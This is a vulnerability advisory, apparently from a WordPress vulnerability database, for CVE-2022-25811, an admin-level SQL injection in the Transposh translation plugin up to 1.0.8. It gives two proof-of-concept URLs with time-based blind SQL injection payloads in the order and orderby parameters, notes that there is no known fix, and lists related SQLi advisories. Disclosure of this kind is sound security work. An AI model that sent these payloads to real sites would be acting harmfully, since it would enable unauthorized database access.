Transposh WordPress Translation <= 1.0.8 – Admin+ SQL Injection | CVE 2022-25811

Description

The plugin does not sanitise and escape the order and orderby parameters before using them in a SQL statement, leading to a SQL injection

Proof of Concept

https://example.com/wp-admin/admin.php?page=tp_editor&action=filter-by&order=+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)
https://example.com/wp-admin/admin.php?page=tp_editor&action=filter-by&orderby=lang+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)

Affects Plugins

transposh-translation-filter-for-wordpress

No known fix

References

CVE

CVE-2022-25811

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

CVSS

6.8 (medium)

Miscellaneous

Original Researcher

Julien Ahrens

Verified

Yes

WPVDB ID

0e0d2c5f-3396-4a0a-a5c6-6a98de3802c9

Timeline

Publicly Published

2022-07-26 (about 3 years ago)

Added

2022-07-26 (about 3 years ago)

Last Updated

2022-08-25 (about 3 years ago)

Other

Published

Title

Published

2025-03-06

Title

CURCY - WooCommerce Multi Currency - Currency Switcher < 2.3.7 - Unauthenticated SQL Injection

Published

2025-12-12

Title

Design Import/Export < 2.3 - Authenticated (Administrator+) SQL Injection via XML File Import

Published

2019-02-14

Title

Booking < 8.4.5.15 - SQL Injection

Published

2024-07-09

Title

CZ Loan Management <= 1.1 - Unauthenticated SQLi

Published

2014-08-01

Title

WP-AutoYoutube <= 0.1 - Blind SQL Injection